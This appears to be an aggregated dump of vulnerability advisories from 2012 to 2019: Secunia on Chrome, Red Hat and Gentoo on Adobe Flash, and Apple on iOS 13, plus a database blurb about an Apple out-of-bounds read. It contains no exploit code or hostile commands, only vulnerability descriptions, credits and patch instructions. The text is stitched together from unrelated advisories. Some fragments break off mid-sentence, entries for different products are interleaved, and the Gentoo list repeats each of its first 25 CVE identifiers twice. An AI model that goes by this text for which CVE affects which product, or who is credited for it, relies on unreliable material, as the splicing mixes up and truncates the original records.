* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51210
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Google Chrome, which
can be exploited by malicious people to bypass certain security
restrictions and compromise a user's system.
For more information:
SA51213
2) An integer overflow error exists in WebP handling.
3) An error in v8 can be exploited to cause an out-of-bounds array
access.
4) A use-after-free error exists in SVG filter handling.
5) An error exists related to integer boundary checks within GPU
command buffers.
6) A use-after-free error exists in video layout handling.
7) An error exists related to inappropriate loading of SVG
subresource in "img" context.
8) A race condition error exists in Pepper buffer handling.
9) A type casting error exists in certain input handling.
10) An error in Skia can be exploited to cause an out-of-bounds
read.
11) An error in texture handling can be exploited to corrupt memory.
12) A use-after-free error exists in extension tab handling.
13) A use-after-free error exists in plug-in placeholder handling.
14) An error in v8 can be exploited to corrupt memory.
SOLUTION:
Upgrade to version 23.0.1271.64.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
2) Phil Turnbull
3, 6) Atte Kettunen, OUSPG.
4, 5) miaubiz
7) Felix Gr\xf6bert, Google Security Team
8) Fermin Serna, Google Security Team
9, 10, 13) Inferno, Google Chrome Security Team
11) Al Patrick, Chromium development community
12) Alexander Potapenko, Chromium development community
14) Cris Neckar, Google Chrome Security Team
ORIGINAL ADVISORY:
Google:
http://googlechromereleases.blogspot.dk/2012/11/stable-channel-release-and-beta-channel.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:1431-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1431.html
Issue date: 2012-11-07
CVE Names: CVE-2012-5274 CVE-2012-5275 CVE-2012-5276
CVE-2012-5277 CVE-2012-5278 CVE-2012-5279
CVE-2012-5280
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes several security issues is
now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security bulletin APSB12-24,
listed in the References section. Specially-crafted SWF content could cause
flash-plugin to crash or, potentially, execute arbitrary code when a victim
loads a page containing the malicious SWF content.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
873818 - flash-plugin: multiple code-execution flaws (APSB12-24)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.251-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.251-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.251-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.251-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.251-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.251-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.251-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.251-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.251-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.251-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-5274.html
https://www.redhat.com/security/data/cve/CVE-2012-5275.html
https://www.redhat.com/security/data/cve/CVE-2012-5276.html
https://www.redhat.com/security/data/cve/CVE-2012-5277.html
https://www.redhat.com/security/data/cve/CVE-2012-5278.html
https://www.redhat.com/security/data/cve/CVE-2012-5279.html
https://www.redhat.com/security/data/cve/CVE-2012-5280.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-24.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFQmiFjXlSAg2UNWIIRAi97AKClBeUc3AMPcWNkYfME6ndKJqg18ACdGuPH
wmLm/s5nqgvfyTp8wUW9wVE=
=fVdJ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites. Please review the CVE identifiers referenced below for
details.
Impact
======
A remote attacker could entice a user to open specially crafted SWF
content, possibly resulting in execution of arbitrary code with the
privileges of the process or a Denial of Service condition.
Furthermore, a remote attacker may be able to bypass access
restrictions.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310"
References
==========
[ 1 ] CVE-2012-5248
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248
[ 2 ] CVE-2012-5248
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248
[ 3 ] CVE-2012-5249
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249
[ 4 ] CVE-2012-5249
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249
[ 5 ] CVE-2012-5250
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250
[ 6 ] CVE-2012-5250
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250
[ 7 ] CVE-2012-5251
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251
[ 8 ] CVE-2012-5251
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251
[ 9 ] CVE-2012-5252
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252
[ 10 ] CVE-2012-5252
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252
[ 11 ] CVE-2012-5253
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253
[ 12 ] CVE-2012-5253
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253
[ 13 ] CVE-2012-5254
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254
[ 14 ] CVE-2012-5254
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254
[ 15 ] CVE-2012-5255
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255
[ 16 ] CVE-2012-5255
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255
[ 17 ] CVE-2012-5256
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256
[ 18 ] CVE-2012-5256
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256
[ 19 ] CVE-2012-5257
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257
[ 20 ] CVE-2012-5257
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257
[ 21 ] CVE-2012-5258
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258
[ 22 ] CVE-2012-5258
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258
[ 23 ] CVE-2012-5259
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259
[ 24 ] CVE-2012-5259
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259
[ 25 ] CVE-2012-5260
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260
[ 26 ] CVE-2012-5260
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260
[ 27 ] CVE-2012-5261
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261
[ 28 ] CVE-2012-5261
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261
[ 29 ] CVE-2012-5262
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262
[ 30 ] CVE-2012-5262
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262
[ 31 ] CVE-2012-5263
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263
[ 32 ] CVE-2012-5263
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263
[ 33 ] CVE-2012-5264
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264
[ 34 ] CVE-2012-5264
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264
[ 35 ] CVE-2012-5265
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265
[ 36 ] CVE-2012-5265
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265
[ 37 ] CVE-2012-5266
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266
[ 38 ] CVE-2012-5266
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266
[ 39 ] CVE-2012-5267
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267
[ 40 ] CVE-2012-5267
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267
[ 41 ] CVE-2012-5268
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268
[ 42 ] CVE-2012-5268
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268
[ 43 ] CVE-2012-5269
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269
[ 44 ] CVE-2012-5269
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269
[ 45 ] CVE-2012-5270
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270
[ 46 ] CVE-2012-5270
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270
[ 47 ] CVE-2012-5271
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271
[ 48 ] CVE-2012-5271
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271
[ 49 ] CVE-2012-5272
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272
[ 50 ] CVE-2012-5272
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272
[ 51 ] CVE-2012-5274
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274
[ 52 ] CVE-2012-5275
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275
[ 53 ] CVE-2012-5276
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276
[ 54 ] CVE-2012-5277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277
[ 55 ] CVE-2012-5278
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278
[ 56 ] CVE-2012-5279
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279
[ 57 ] CVE-2012-5280
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280
[ 58 ] CVE-2012-5676
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676
[ 59 ] CVE-2012-5677
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677
[ 60 ] CVE-2012-5678
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678
[ 61 ] CVE-2013-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504
[ 62 ] CVE-2013-0630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630
[ 63 ] CVE-2013-0633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633
[ 64 ] CVE-2013-0634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634
[ 65 ] CVE-2013-0637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637
[ 66 ] CVE-2013-0638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638
[ 67 ] CVE-2013-0639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639
[ 68 ] CVE-2013-0642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642
[ 69 ] CVE-2013-0643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643
[ 70 ] CVE-2013-0644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644
[ 71 ] CVE-2013-0645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645
[ 72 ] CVE-2013-0646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646
[ 73 ] CVE-2013-0647
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647
[ 74 ] CVE-2013-0648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648
[ 75 ] CVE-2013-0649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649
[ 76 ] CVE-2013-0650
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650
[ 77 ] CVE-2013-1365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365
[ 78 ] CVE-2013-1366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366
[ 79 ] CVE-2013-1367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367
[ 80 ] CVE-2013-1368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368
[ 81 ] CVE-2013-1369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369
[ 82 ] CVE-2013-1370
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370
[ 83 ] CVE-2013-1371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371
[ 84 ] CVE-2013-1372
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372
[ 85 ] CVE-2013-1373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373
[ 86 ] CVE-2013-1374
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374
[ 87 ] CVE-2013-1375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375
[ 88 ] CVE-2013-1378
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378
[ 89 ] CVE-2013-1379
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379
[ 90 ] CVE-2013-1380
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380
[ 91 ] CVE-2013-2555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555
[ 92 ] CVE-2013-2728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728
[ 93 ] CVE-2013-3343
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343
[ 94 ] CVE-2013-3344
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344
[ 95 ] CVE-2013-3345
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345
[ 96 ] CVE-2013-3347
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347
[ 97 ] CVE-2013-3361
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361
[ 98 ] CVE-2013-3362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362
[ 99 ] CVE-2013-3363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363
[ 100 ] CVE-2013-5324
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201309-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
|
|
var-201912-0574
|
An out-of-bounds read was addressed with improved input validation. plural Apple The product contains an out-of-bounds read vulnerability due to flawed input validation.A remote attacker could cause an unexpected application termination or execute arbitrary code. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. Apple macOS Mojave is a dedicated operating system developed for Mac computers. Foundation is one of the frameworks that provides basic system services for all applications. A buffer error vulnerability exists in Foundation components in several Apple products. The following products and versions are affected: Apple iOS prior to 12.4; tvOS prior to 12.4; macOS Mojave prior to 10.14.6; watchOS prior to 5.3.
CVE-2019-8693: Arash Tohidi of Solita
autofs
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.5
Impact: Extracting a zip file containing a symbolic link to an
endpoint in an NFS mount that is attacker controlled may bypass
Gatekeeper
Description: This was addressed with additional checks by Gatekeeper
on files mounted through a network share.
Alternatively, on your watch, select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-10-29-6 Additional information
for APPLE-SA-2019-9-26-3 iOS 13
iOS 13 addresses the following:
Bluetooth
Available for: iPhone 6s and later
Impact: Notification previews may show on Bluetooth accessories even
when previews are disabled
Description: A logic issue existed with the display of notification
previews.
CVE-2019-8711: Arjang of MARK ANTHONY GROUP INC., Cemil Ozkebapci
(@cemilozkebapci) of Garanti BBVA, Oguzhan Meral of Deloitte
Consulting, Ömer Bozdoğan-Ramazan Atıl Anadolu Lisesi
Adana/TÜRKİYE
CFNetwork
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: This issue was addressed with improved checks.
CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland
Entry added October 29, 2019
CoreAudio
Available for: iPhone 6s and later
Impact: Processing a maliciously crafted movie may result in the
disclosure of process memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
CoreCrypto
Available for: iPhone 6s and later
Impact: Processing a large input may lead to a denial of service
Description: A denial of service issue was addressed with improved
input validation.
CVE-2019-8741: Nicky Mouha of NIST
Entry added October 29, 2019
CoreMedia
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8825: Found by GWP-ASan in Google Chrome
Entry added October 29, 2019
Face ID
Available for: iPhone 6s and later
Impact: A 3D model constructed to look like the enrolled user may
authenticate via Face ID
Description: This issue was addressed by improving Face ID machine
learning models.
CVE-2019-8641: Samuel Groß and Natalie Silvanovich of Google Project
Zero
CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project
Zero
Entry added October 29, 2019
IOUSBDeviceFamily
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8718: Joshua Hill and Sem Voigtländer
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: A local app may be able to read a persistent account
identifier
Description: A validation issue was addressed with improved logic.
CVE-2019-8809: Apple
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8709: derrek (@derrekr6)
[confirmed]derrek (@derrekr6)
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8717: Jann Horn of Google Project Zero
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8712: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory corruption issue existed in the handling of
IPv6 packets.
CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team
Entry added October 29, 2019
Keyboards
Available for: iPhone 6s and later
Impact: A local user may be able to leak sensitive user information
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC
libxml2
Available for: iPhone 6s and later
Impact: Multiple issues in libxml2
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8749: found by OSS-Fuzz
CVE-2019-8756: found by OSS-Fuzz
Entry added October 29, 2019
Messages
Available for: iPhone 6s and later
Impact: A person with physical access to an iOS device may be able to
access contacts from the lock screen
Description: The issue was addressed by restricting options offered
on a locked device.
CVE-2019-8742: videosdebarraquito
Notes
Available for: iPhone 6s and later
Impact: A local user may be able to view a user's locked notes
Description: The contents of locked notes sometimes appeared in
search results.
CVE-2019-8730: Jamie Blumberg (@jamie_blumberg) of Virginia
Polytechnic Institute and State University
Entry added October 29, 2019
PluginKit
Available for: iPhone 6s and later
Impact: A local user may be able to check for the existence of
arbitrary files
Description: A logic issue was addressed with improved restrictions.
CVE-2019-8708: an anonymous researcher
Entry added October 29, 2019
PluginKit
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8715: an anonymous researcher
Entry added October 29, 2019
Quick Look
Available for: iPhone 6s and later
Impact: Processing a maliciously crafted file may disclose user
information
Description: A permissions issue existed in which execute permission
was incorrectly granted.
CVE-2019-8731: Saif Hamed Hamdan Al Hinai of Oman National CERT,
Yiğit Can YILMAZ (@yilmazcanyigit)
Safari
Available for: iPhone 6s and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: A logic issue was addressed with improved state
management.
CVE-2019-8727: Divyanshu Shukla (@justm0rph3u5)
UIFoundation
Available for: iPhone 6s and later
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: Maliciously crafted web content may violate iframe sandboxing
policy
Description: This issue was addressed with improved iframe sandbox
enforcement.
CVE-2019-8771: Eliya Stein of Confiant
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8707: an anonymous researcher working with Trend Micro's
Zero Day Initiative, cc working with Trend Micro Zero Day Initiative
CVE-2019-8726: Jihui Lu of Tencent KeenLab
CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of
ABLY Corporation
CVE-2019-8733: Sergei Glazunov of Google Project Zero
CVE-2019-8734: found by OSS-Fuzz
CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: A user may be unable to delete browsing history items
Description: "Clear History and Website Data" did not clear the
history.
CVE-2019-8768: Hugo S. Diaz (coldpointblue)
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8625: Sergei Glazunov of Google Project Zero
CVE-2019-8719: Sergei Glazunov of Google Project Zero
CVE-2019-8764: Sergei Glazunov of Google Project Zero
Entry added October 29, 2019
WebKit Page Loading
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8674: Sergei Glazunov of Google Project Zero
Additional recognition
AppleRTC
We would like to acknowledge Vitaly Cheptsov for their assistance.
Audio
We would like to acknowledge riusksk of VulWar Corp working with
Trend Micro's Zero Day Initiative for their assistance.
Bluetooth
We would like to acknowledge Jan Ruge of TU Darmstadt, Secure Mobile
Networking Lab, Jiska Classen of TU Darmstadt, Secure Mobile
Networking Lab, Francesco Gringoli of University of Brescia, Dennis
Heinze of TU Darmstadt, Secure Mobile Networking Lab for their
assistance.
boringssl
We would like to acknowledge Thijs Alkemade (@xnyhps) of Computest
for their assistance.
Control Center
We would like to acknowledge Brandon Sellers for their assistance.
HomeKit
We would like to acknowledge Tian Zhang for their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Keyboard
We would like to acknowledge an anonymous researcher for their
assistance.
Mail
We would like to acknowledge Kenneth Hyndycz for their assistance.
mDNSResponder
We would like to acknowledge Gregor Lang of e.solutions GmbH for
their assistance.
Profiles
We would like to acknowledge Erik Johnson of Vernon Hills High School
and James Seeley (@Code4iOS) of Shriver Job Corps for their
assistance.
SafariViewController
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
VPN
We would like to acknowledge Royce Gawron of Second Son Consulting,
Inc. for their assistance.
WebKit
We would like to acknowledge MinJeong Kim of Information Security
Lab, Chungnam National University, JaeCheol Ryou of the Information
Security Lab, Chungnam National University in South Korea, Yiğit Can
YILMAZ (@yilmazcanyigit), Zhihua Yao of DBAPPSecurity Zion Lab, an
anonymous researcher, and cc working with Trend Micro's Zero Day
Initiative for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 13".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl24s3oACgkQBz4uGe3y
0M1GMxAAnwBO9htU2i7+SHsXiEt2xJbjilLMM9V5LObjUWqaHXOxdQuYiPxFy9lR
neTOHwR2z1f3L3UPkGut28i24w7fwHVBdFh7w5p5RXlBf7tcRmFhKBUkYIhQ90Qj
jO6DXiCL9InCBVs2nW9Fr4yYV13kdoES6MfguyldGVpQMkyUcZ3F2XK0RCHNqEgz
h+1dR/uws3Ce+HNbb7wnqe4UzAI5DJUR/vH98+fWTl5P6CCaoZrv53vaxErLRBXi
gn/4rtzw+wDlThlrpkE5MwxmvLMF2ZqjUhOSVzKb3qXK+RFgE9FH8SKEBKkCxAa+
8/vZu+zdbN6KCzO608TXH9rNO2LbtQqTlO/jHGTJ30UEaKo9PyFozGkCE6XkWmFU
xtayVkSL08drJEgm+CB80g//hr2CESF0fMHFe8yQYeN2uL5yQxoavyub8E/nPKn1
v32Z6Z2fpGzP3eCLYbV93cBcdJaeXTdib47vvodyYFfFEja7xrv0AvPAbSSm98DK
VtFw3eNAKRbmIEAeY4b1uhdB+qUiqMEWqh0sd97+chY2Do90/4IG/3caLc0pTpDt
huDUQs/IbSujrdjCWSfz35qU4u9sxPpM8wQR2M7mdfY9qGp+Xgfh/MprSZ4wOuS3
PAAs5Pdr9GfymsB+CDpMEr+DiTOza6SUjIadZ+j2FWaklzg7h1A=
=NYIZ
-----END PGP SIGNATURE-----
.
CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole
Tippenhauer of CISPA, Germany, and Prof.
CVE-2019-8644: G. Ltd.
CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative
CVE-2019-8671: Apple
CVE-2019-8672: Samuel Groß of Google Project Zero
CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech
CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech
CVE-2019-8677: Jihui Lu of Tencent KeenLab
